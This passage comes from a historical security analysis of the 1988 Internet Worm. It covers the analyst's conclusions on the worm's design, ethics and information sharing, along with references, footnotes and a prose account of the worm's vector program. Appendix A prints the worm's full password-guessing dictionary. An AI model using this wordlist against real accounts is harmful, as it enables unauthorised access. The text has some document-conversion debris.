  1371. been a moderately experienced UNIX programmer, but s/he was by no
  1372. means the ``UNIX Wizard'' many have been claiming. The code
  1373. employs a few clever techniques and tricks, but there is some
  1374. doubt if they are all the original work of the Worm author. The
  1375. code seems to be the product of an inexperienced or sloppy
  1376. programmer. The person \(or persons\) who put this program
  1377. together appears to lack fundamental insight into some
  1378. algorithms, data structures, and network propagation, but at the
  1379. same time has some very sophisticated knowledge of network
  1380. features and facilities. The code does not appear to have been
  1381. tested \(although anything other than unit testing would not be
  1382. simple to do\), or else it was prematurely released. Actually, it
  1383. is possible that both of these conclusions are correct. The
  1384. presence of so much dead and duplicated code coupled with the
  1385. size of some data structures \(such as the 20-slot object code
  1386. array\) argues that the program was intended to be more
  1387. comprehensive.
  1388. 7. Conclusions
  1389. It is clear from the code that the worm was deliberately designed
  1390. to do two things: infect as many machines as possible, and be
  1391. difficult to track and stop. There can be no question that this
  1392. was in any way an accident, although its release may have been
  1393. premature. It is still unknown if this worm, or a future version
  1394. of it, was to accomplish any other tasks. Although an author has
  1395. been alleged \(Robert T. Morris\), he has not publicly confessed
  1396. nor has the matter been definitively proven. Considering the
  1397. probability of both civil and criminal legal actions, a
  1398. confession and an explanation are unlikely to be forthcoming any
  1399. time soon. Speculation has centered on motivations as diverse as
  1400. revenge, pure intellectual curiosity, and a desire to impress
  1401. someone. This must remain speculation for the time being,
  1402. however, since we do not have access to a definitive statement
  1403. >From the author\(s\). At the least, there must be some question
  1404. about the psychological makeup of someone who would build and run
  1405. such software.
  1406. 18
  1407. Many people have stated that the authors of this code
  1408. 19
  1409. must have been ``computer geniuses'' of some sort. I have been
  1410. bothered by that supposition since first hearing it, and after
  1411. having examined the code in some depth, I am convinced that this
  1412. program is not evidence to support any such claim. The code was
  1413. apparently unfinished and done by someone clever but not
  1414. particularly gifted, at least in the way we usually associate
  1415. with talented programmers and designers. There were many bugs and
  1416. mistakes in the code that would not be made by a careful,
  1417. competent programmer. The code does not evidence clear
  1418. understanding of good data structuring, algorithms, or even of
  1419. security flaws in UNIX. It does contain clever exploitations of
  1420. two specific flaws in system utilities, but that is hardly
  1421. evidence of genius. In general, the code is not that impressive,
  1422. and its ``success'' was probably due to a large amount of luck
  1423. rather than any programming skill possessed by the author. Chance
  1424. favored most of us, however. The effects of this worm were
  1425. \(largely\) benign, and it was easily stopped. Had the code been
  1426. tested and developed further by someone more experienced, or had
  1427. it been coupled with something destructive, the toll would have
  1428. been considerably higher. I can easily think of several dozen
  1429. people who could have written this program, and not only done it
  1430. with far fewer \(if any\) errors, but made it considerably more
  1431. virulent. Thankfully, those individuals are all responsible,
  1432. dedicated professionals who would not consider such an act. What
  1433. we learn from this about securing our systems will help determine
  1434. if this is the only such incident we ever need to analyze. This
  1435. attack should also point out that we need a better mechanism in
  1436. place to coordinate information about security flaws and attacks.
  1437. The response to this incident was largely ad hoc, and resulted in
  1438. both duplication of effort and a failure to disseminate valuable
  1439. information to sites that needed it. Many site administrators
  1440. discovered the problem from reading the newspaper or watching the
  1441. television. The major sources of information for many of the
  1442. sites affected seems to have been Usenet news groups and a
  1443. mailing list I put together when the worm was first discovered.
  1444. Although useful, these methods did not ensure timely, widespread
  1445. dissemination of useful information \320 especially since they
  1446. depended on the Internet to work! Over three weeks after this
  1447. incident some sites are still not reconnected to the Internet.
  1448. This is the second time in six months that a major panic has hit
  1449. the Internet community.The first occurred in May when a rumor
  1450. swept the community that a ``logic bomb'' had been planted in Sun
  1451. software by a disgruntled employee. Many, many sites turned their
  1452. system clocks back or they shut off their systems to prevent
  1453. damage. The personnel at Sun Microsystems responded to this in an
  1454. admirable fashion, conducting in-house testing to isolate any
  1455. such threat, and issuing information to the community about how
  1456. to deal with the situation. Unfortunately, almost everyone else
  1457. seems to have watched events unfold, glad that they were not the
  1458. ones who had to deal with the situation. The worm has shown us
  1459. that we are all affected by events in our shared environment, and
  1460. we need to develop better information methods outside the network
  1461. before the next crisis. This whole episode should cause us to
  1462. think about the ethics and laws concerning access to computers.
  1463. The technology we use has developed so quickly it is not always
  1464. simple to determine where the proper boundaries of moral action
  1465. may be. Many senior computer professionals started their careers
  1466. years ago by breaking into computer systems at their colleges and
  1467. places of employment to demonstrate their expertise. However,
  1468. times have changed and mastery of computer science and computer
  1469. engineering now involves a great deal more than can be shown by
  1470. using intimate knowledge of the flaws in a particular operating
  1471. system. Entire businesses are now dependent, wisely or not, on
  1472. computer systems. People's money, careers, and possibly even
  1473. their lives may be dependent on the undisturbed functioning of
  1474. computers. As a society, we cannot afford the consequences of
  1475. condoning or encouraging behavior that threatens or damages
  1476. computer systems. As professionals, computer scientists and
  1477. computer engineers cannot afford to tolerate the romanticization
  1478. of computer vandals and computer criminals. This incident should
  1479. also prompt some discussion about distribution of security-
  1480. related information. In particular, since hundreds of sites have
  1481. ``captured'' the binary form of the worm, and since personnel at
  1482. those sites have utilities and knowledge that enables them to
  1483. reverse-engineer the worm code, we should ask how long we expect
  1484. it to be beneficial to keep the code unpublished? As I mentioned
  1485. in the introduction, at least five independent groups have
  1486. produced reverse-engineered versions of the worm, and I expect
  1487. many more have been done or will be attempted, especially if the
  1488. current versions are kept private. Even if none of these versions
  1489. is published in any formal way, hundreds of individuals will have
  1490. had access to a copy before the end of the year. Historically,
  1491. trying to ensure security of software through secrecy has proven
  1492. to be ineffective in the long term. It is vital that we educate
  1493. system administrators and make bug fixes available to them in
  1494. some way that does not compromise their security. Methods that
  1495. prevent the dissemination of information appear to be completely
  1496. contrary to that goal. Last, it is important to note that the
  1497. nature of both the Internet and UNIX helped to defeat the worm as
  1498. well as spread it. The immediacy of communication, the ability to
  1499. copy source and binary files from machine to machine, and the
  1500. widespread availability of both source and expertise allowed
  1501. personnel throughout the country to work together to solve the
  1502. infection even despite the widespread disconnection of parts of
  1503. the network. Although the immediate reaction of some people might
  1504. be to restrict communication or promote a diversity of
  1505. incompatible software options to prevent a recurrence of a worm,
  1506. that would be entirely the wrong reaction. Increasing the
  1507. obstacles to open communication or decreasing the number of
  1508. people with access to in-depth information will not prevent a
  1509. determined attacker\320it will only decrease the pool of
  1510. expertise and resources available to fight such an attack.
  1511. Further, such an attitude would be contrary to the whole purpose
  1512. of having an open, research-oriented network. The Worm was caused
  1513. by a breakdown of ethics as well as lapses in security\320a
  1514. purely technological attempt at prevention will not address the
  1515. full problem, and may just cause new difficulties.
  1516. Acknowledgments
  1517. Much of this analysis was performed on reverse-engineered
  1518. versions of the worm code. The following people were involved in
  1519. the production of those versions: Donald J. Becker of Harris
  1520. Corporation, Keith Bostic of Berkeley, Donn Seeley of the
  1521. University of Utah, Chris Torek of the University of Maryland,
  1522. Dave Pare of FX Development, and the team at MIT: Mark W. Eichin,
  1523. Stanley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochlis,
  1524. Ken Raeburn, Hal Birkeland and John T. Kohl. A disassembled
  1525. version of the worm code was provided at Purdue by staff of the
  1526. Purdue University Computing Center, Rich Kulawiec in particular.
  1527. Thanks to the individuals who reviewed early drafts of this paper
  1528. and contributed their advice and expertise: Don Becker, Kathy
  1529. Heaphy, Brian Kantor, R. J. Martin, Richard DeMillo, and
  1530. especially Keith Bostic and Steve Bellovin. My thanks to all
  1531. these individuals. My thanks and apologies to anyone who should
  1532. have been credited and was not.
  1533. References
  1534. Allm83. Allman, Eric,
  1535. Sendmail\320An Internetwork Mail Router,
  1536. University of California, Berkeley, 1983. Issued with the BSD
  1537. UNIX documentation set.
  1538. Brun75. Brunner, John, The Shockwave Rider, Harper & Row, 1975.
  1539. Cohe84. Cohen, Fred, ``Computer Viruses: Theory and
  1540. Experiments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER SECURITY
  1541. CONFERENCE, pp. 240-263, 1984.
  1542. Denn88. Denning, Peter J., ``Computer Viruses,'' AMERICAN
  1543. SCIENTIST, vol. 76, pp. 236-238, May-June 1988.
  1544. Dewd85. Dewdney, A. K., ``A Core War Bestiary of viruses, worms,
  1545. and other threats to computer memories,'' SCIENTIFIC AMERICAN,
  1546. vol. 252, no. 3, pp. 14-23, May 1985.
  1547. Gerr72. Gerrold, David, When Harlie Was One, Ballentine Books,
  1548. 1972. The first edition.
  1549. Gram84. Grampp, Fred. T. and Robert H. Morris, ``UNIX Operating
  1550. System Security,''
  1551. AT&T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part 2,
  1552. pp. 1649-1672, Oct. 1984.
  1553. Harr77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI Network
  1554. Information Center, December 1977.
  1555. Morr79. Morris, Robert and Ken Thompson, ``UNIX Password
  1556. Security,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594-
  1557. 597, ACM, November 1979.
  1558. Post82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,''
  1559. RFC 821, SRI Network Information Center, August 1982.
  1560. Reid87. Reid, Brian, ``Reflections on Some Recent Widespread
  1561. Computer Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no. 2,
  1562. pp. 103-105, ACM, February 1987.
  1563. Ritc79.Ritchie, Dennis M., ``On the Security of UNIX, '' in U nt
  1564. 2 def IX nt 0 def
  1565. SUPPLEMENTARY DOCUMENTS, AT & T, 1979. Seel88. Seeley, Donn, ``A
  1566. Tour of the Worm,'' TECHNICAL REPORT, Computer Science Dept.,
  1567. University of Utah, November 1988. Unpublished report.
  1568. Shoc82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs \320
  1569. Early Experience with a Distributed Computation,'' COMMUNICATIONS
  1570. OF THE ACM, vol. 25, no. 3, pp. 172-180, ACM, March 1982.
  1571. Appendix A The Dictionary
  1572. What follows is the mini-dictionary of words contained in the
  1573. worm. These were tried when attempting to break user passwords.
  1574. Looking through this list is, in some sense revealing, but
  1575. actually raises a significant question: how was this list chosen?
  1576. The assumption has been expressed by many people that this list
  1577. represents words commonly used as passwords; this seems unlikely.
  1578. Common choices for passwords usually include fantasy characters,
  1579. but this list contains none of the likely choices \(e.g.,
  1580. ``hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''\).
  1581. Names of relatives and friends are often used, and we see women's
  1582. names like ``jessica,'' ``caroline,'' and ``edwina,'' but no
  1583. instance of the common names ``jennifer'' or ``kathy.'' Further,
  1584. there are almost no men's names such as ``thomas'' or either of
  1585. ``stephen'' or ``steven'' \(or ``eugene''!\). Additionally, none
  1586. of these have the initial letters capitalized, although that is
  1587. often how they are used in passwords. Also of interest, there are
  1588. no obscene words in this dictionary, yet many reports of
  1589. concerted password cracking experiments have revealed that there
  1590. are a significant number of users who use such words \(or
  1591. phrases\) as passwords. The list contains at least one incorrect
  1592. spelling: ``commrades'' instead of ``comrades''; I also believe
  1593. that ``markus'' is a misspelling of ``marcus.'' Some of the words
  1594. do not appear in standard dictionaries and are non-English names:
  1595. ``jixian,'' ``vasant,'' ``puneet,'' etc. There are also some
  1596. unusual words in this list that I would not expect to be
  1597. considered common: ``anthropogenic,'' ``imbroglio,'' ``umesh,''
  1598. ``rochester,'' ``fungible,'' ``cerulean,'' etc. I imagine that
  1599. this list was derived from some data gathering with a limited set
  1600. of passwords, probably in some known \(to the author\) computing
  1601. environment. That is, some dictionary-based or brute-force attack
  1602. was used to crack a selection of a few hundred passwords taken
  1603. >From a small set of machines. Other approaches to gathering
  1604. passwords could also have been used\320Ethernet monitors, Trojan
  1605. Horse login programs, etc. However they may have been cracked,
  1606. the ones that were broken would then have been added to this
  1607. dictionary. Interestingly enough, many of these words are not in
  1608. the standard on-line dictionary \(in /usr/dict/words\). As such,
  1609. these words are useful as a supplement to the main dictionary-
  1610. based attack the worm used as strategy #4, but I would suspect
  1611. them to be of limited use before that time. This unusual
  1612. composition might be useful in the determination of the
  1613. author\(s\) of this code. One approach would be to find a system
  1614. with a user or local dictionary containing these words. Another
  1615. would be to find some system\(s\) where a significant quantity of
  1616. passwords could be broken with this list. aaa academia aerobics
  1617. airplane albany albatross albert alex alexander algebra aliases
  1618. alphabet ama amorphous analog anchor andromache animals answer
  1619. anthropogenic anvils anything aria ariadne arrow arthur athena
  1620. atmosphere aztecs azure bacchus bailey banana bananas bandit
  1621. banks barber baritone bass bassoon batman beater beauty beethoven
  1622. beloved benz beowulf berkeley berliner beryl beverly bicameral
  1623. bob brenda brian bridget broadway bumbling burgess campanile
  1624. cantor cardinal carmen carolina caroline cascades castle cat
  1625. cayuga celtics cerulean change charles charming charon chester
  1626. cigar classic clusters coffee coke collins commrades computer
  1627. condo cookie cooper cornelius couscous creation creosote cretin
  1628. daemon dancer daniel danny dave december defoe deluge desperate
  1629. develop dieter digital discovery disney dog drought duncan eager
  1630. easier edges edinburgh edwin edwina egghead eiderdown eileen
  1631. einstein elephant elizabeth ellenemeraldengine engineer
  1632. enterprise enzyme ersatz establish estate euclid evelyn extension
  1633. fairway felicia fender fermat fidelity finite fishers flakes
  1634. float flower flowers foolproof football foresight format forsythe
  1635. fourier fred friend frighten fun fungible gabriel gardner
  1636. garfield gauss george gertrude ginger glacier gnu golfer gorgeous
  1637. gorges gosling gouge graham gryphon guestguitargumption guntis
  1638. hacker hamlet handily happening harmony harold harvey hebrides
  1639. heinlein hello help herbert hiawatha hibernia honey horse horus
  1640. hutchins imbroglio imperial include ingres inna innocuous
  1641. irishman isis japan jessica jester jixian johnny joseph joshua
  1642. judith juggle julia kathleen kermit kernel kirkland knight ladle
  1643. lambda lamination larkin larry lazaruslebesguelee leland leroy
  1644. lewis light lisa louis lynne macintosh mack maggot magic malcolm
  1645. mark markus marty marvin master maurice mellon merlin mets
  1646. michael michelle mike minimum minsky moguls moose morley mozart
  1647. nancy napoleon nepenthe ness network newton next noxious
  1648. nutrition nyquist oceanography ocelot olivetti olivia oracle orca
  1649. orwell osirisoutlawoxford pacific painless pakistan pam papers
  1650. password patricia penguin peoria percolate persimmon persona pete
  1651. peter philip phoenix pierre pizza plover plymouth polynomial
  1652. pondering pork poster praise precious prelude prince princeton
  1653. protect protozoa pumpkin puneet puppet rabbit rachmaninoff
  1654. rainbow raindrop raleigh random rascal really rebecca remote rick
  1655. ripple robotics rochesterrolexromano ronald rosebud rosemary
  1656. roses ruben rules ruth sal saxon scamper scheme scott scotty
  1657. secret sensor serenity sharks sharon sheffield sheldon shiva
  1658. shivers shuttle signature simon simple singer single smile smiles
  1659. smooch smother snatch snoopy soap socrates sossina sparrows spit
  1660. spring springer squires strangle stratford stuttgart subway
  1661. success summer supersuperstage support supported surfer suzanne
  1662. swearer symmetry tangerine tape target tarragon taylor telephone
  1663. temptation thailand tiger toggle tomato topography tortoise
  1664. toyota trails trivial trombone tubas tuttle umesh unhappy unicorn
  1665. unknown urchin utility vasant vertigo vicky village virginia
  1666. warren water weenie whatnot whiting whitney will william
  1667. williamsburg willie winston wisconsinwizardwombat woodwind
  1668. wormwood yacov yang yellowstone yosemite zap zimmerman
  1669. Appendix B The Vector Program
  1670. The worm was brought over to each machine it infected via the
  1671. actions of a small program I call the vector program. Other
  1672. individuals have been referring to this as the grappling hook
  1673. program. Some people have referred to it as the program, since
  1674. that is the suffix used on each copy. The source for this program
  1675. would be transferred to the victim machine using one of the
  1676. methods discussed in the paper. It would then be compiled and
  1677. invoked on the victim machine with three command line arguments:
  1678. the canonical IP address of the infecting machine, the number of
  1679. the TCP port to connect to on that machine to get copies of the
  1680. main worm files, and a magic number that effectively acted as a
  1681. one-time-challenge password. If the ``server'' worm on the remote
  1682. host and port did not receive the same magic number back before
  1683. starting the transfer, it would immedi- ately disconnect from the
  1684. vector program. This can only have been to prevent some- one from
  1685. attempting to ``capture'' the binary files by spoofing a worm
  1686. ``server.'' This code also goes to some effort to hide itself,
  1687. both by zeroing out the argu- ment vector, and by immediately
  1688. forking a copy of itself. If a failure occurred in transferring a
  1689. file, the code deleted all files it had already transferred, then
  1690. it exited. One other key item to note in this code is that the
  1691. vector was designed to be able to transfer up to 20 files; it was
  1692. used with only three. This can only make one wonder if a more
  1693. extensive version of the worm was planned for a later date, and
  1694. if that version might have carried with it other command files,
  1695. password data, or possibly local virus or trojan horse programs.
  1696. <<what follows is a pair of programs that I was unable to decode
  1697. with any dependability>>
  1698. References:
  1699. BSD is an acronym for Berkeley Software Distribution.
  1700. UNIX is a registered trademark of AT&T Laboratories.
  1701. VAX is a trademark of Digital Equipment Corporation.
  1702. The second edition of the book, just published, has been
  1703. ``updated'' to omit this subplot about VIRUS.
  1704. %%Page: 4 5
  1705. 5
  1706. It is probably a coincidence that the Internet Worm was loosed on
  1707. November 2, the eve of this ``birthday.''
  1708. 6
  1709. Note that a widely used alternative to sendmail, MMDF, is also
  1710. viewed as too complex and large by many users. Further, it is
  1711. not perceived to be as flexible as sendmail if it is necessary
  1712. to establish special addressing and handling rules when bridging
  1713. heterogeneous networks.
  1714. 7
  1715. Strictly speaking, the password is not encrypted. A block of zero
  1716. bits is repeatedly encrypted using the user password, and the
  1717. results of this encryption is what is saved. See [Morr79] for
  1718. more details.
  1719. 8
  1720. Such a list would likely include all words in the dictionary, the
  1721. reverse of all such words, and a large collection of proper
  1722. names.
  1723. 8
  1724. rexec is a remote command execution service. It requires that a
  1725. username/password combination be supplied as part of the
  1726. request.
  1727. 9
  1728. This was compiled in as port number 23357, on host 127.0.0.1 \(loopback\).
  1729. 10
  1730. Using TCP port 11357 on host 128.32.137.13.
  1731. 11
  1732. Interestingly, although the program was coded to get the address
  1733. of the host on the remote end of point-to-point links, no use
  1734. seems to have been made of that information.
  1735. 12
  1736. As if some of them aren't suspicious enough!
  1737. 13
  1738. This appears to be a bug. The probable assumption was that the
  1739. routine hl would handle infection of local hosts, but hl calls
  1740. this routine! Thus, local hosts were never infected via this
  1741. route.
  1742. 14
  1743. This is puzzling. The appropriate file to scan for equivalent
  1744. hosts would have been the .rhosts file, not the .forward file.
  1745. 15
  1746. Private communication from someone present at the meeting.
  1747. 16
  1748. The thought of a Sequent Symmetry or Gould NP1 infected with
  1749. multiple copies of the worm presents an awesome \(and awful\)
  1750. thought. The effects noticed locally when the worm broke into a
  1751. mostly unloaded VAX 8800 were spectacular. The effects on a
  1752. machine with one or two orders of magnitude more capacity is a
  1753. frightening thought.
  1754. 17
  1755. Developed by Kevin Braunsdorf and Rich Kulawiec at Purdue PUCC.
  1756. 18
  1757. Rick Adams, of the Center for Seismic Studies, has commented that
  1758. we may someday hear that the worm was loosed to impress Jodie
  1759. Foster. Without further information, this is as valid a
  1760. speculation as any other, and should raise further disturbing
  1761. questions; not everyone with access to computers is rational and
  1762. sane, and future attacks may reflect this.
  1763. 19
  1764. Throughout this paper I have been writing author\(s\) instead of
  1765. author. It occurs to me that most of the mail, Usenet postings,
  1766. and media coverage of this incident have assumed that it was
  1767. author \(singular\). Are we so unaccustomed to working together
  1768. on programs that this is our natural inclination? Or is it that
  1769. we find it hard to believe that more than one individual could
  1770. have such poor judgement? I also noted that most of people I
  1771. spoke with seemed to assume that the worm author was male. I
  1772. leave it to others to speculate on the value, if any, of these
  1773. observations.

comments powered by Disqus